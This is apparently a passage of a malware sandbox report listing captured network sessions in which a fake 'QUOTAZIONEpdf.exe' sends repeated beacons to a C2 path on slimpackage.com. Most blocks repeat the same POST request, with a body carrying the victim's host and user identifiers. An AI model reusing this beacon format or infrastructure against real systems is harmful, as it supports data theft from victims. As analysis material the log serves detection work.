              30192.168.2.349806104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:32.376585007 CET1984OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:32.501925945 CET1985OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:32.632582903 CET1987INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:31 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.349813104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:34.797107935 CET2000OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:34.921205997 CET2000OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:35.055516958 CET2000INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.349814104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:38.518335104 CET2001OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:38.642458916 CET2001OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:38.778532028 CET2002INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.349815104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:42.966613054 CET2003OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:43.102488041 CET2003OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:43.286082029 CET2005INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.349821104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:50.386625051 CET9596OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:50.509305954 CET9596OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:50.642754078 CET9596INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              35192.168.2.349822104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:54.269267082 CET9597OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:54.395328999 CET9597OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:54.529158115 CET9598INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              36192.168.2.349824104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:57.036107063 CET10122OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:57.158740997 CET10273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:57.289953947 CET10273INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              37192.168.2.349825104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:59.975080013 CET10274OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:00.099469900 CET10274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:00.267862082 CET10274INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:59 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              38192.168.2.349826104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:02.086796045 CET10275OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:02.212654114 CET10275OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:02.343744040 CET10276INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              39192.168.2.349832104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:03.505878925 CET10288OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:03.630158901 CET10289OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:03.763714075 CET10292INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:02 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.349746104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:44.662959099 CET1110OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:44.787275076 CET1110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:44.925323009 CET1111INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:43 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              40192.168.2.349840104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:04.907351017 CET10305OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:05.030078888 CET10307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:05.161437035 CET10309INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:04 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              41192.168.2.349852104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:07.608302116 CET10337OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:07.732930899 CET10337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:07.866544008 CET10338INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              42192.168.2.349853104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:10.712951899 CET10338OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:10.835877895 CET10339OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:10.966197014 CET10339INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              43192.168.2.349854104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:14.681171894 CET10340OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:14.805303097 CET10340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:14.940711975 CET10340INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:13 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              44192.168.2.349855104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:17.053160906 CET10341OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:17.180231094 CET10342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:17.313810110 CET10342INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:16 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              45192.168.2.349856104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:20.315522909 CET10343OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:20.439775944 CET10344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:20.574155092 CET10344INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              46192.168.2.349857104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:22.278675079 CET10345OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:22.414038897 CET10345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:22.548707962 CET10345INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              47192.168.2.349858104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:24.759273052 CET10346OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:24.883680105 CET10346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:25.014372110 CET10347INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:23 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              48192.168.2.349859104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:26.128942013 CET10347OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:26.256269932 CET10348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:26.390346050 CET10348INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              49192.168.2.349860104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:27.459033012 CET10349OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:27.583146095 CET10349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:27.717861891 CET10349INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:26 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.349747104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:46.652462959 CET1111OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:46.776705980 CET1112OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:46.909101009 CET1112INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:45 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


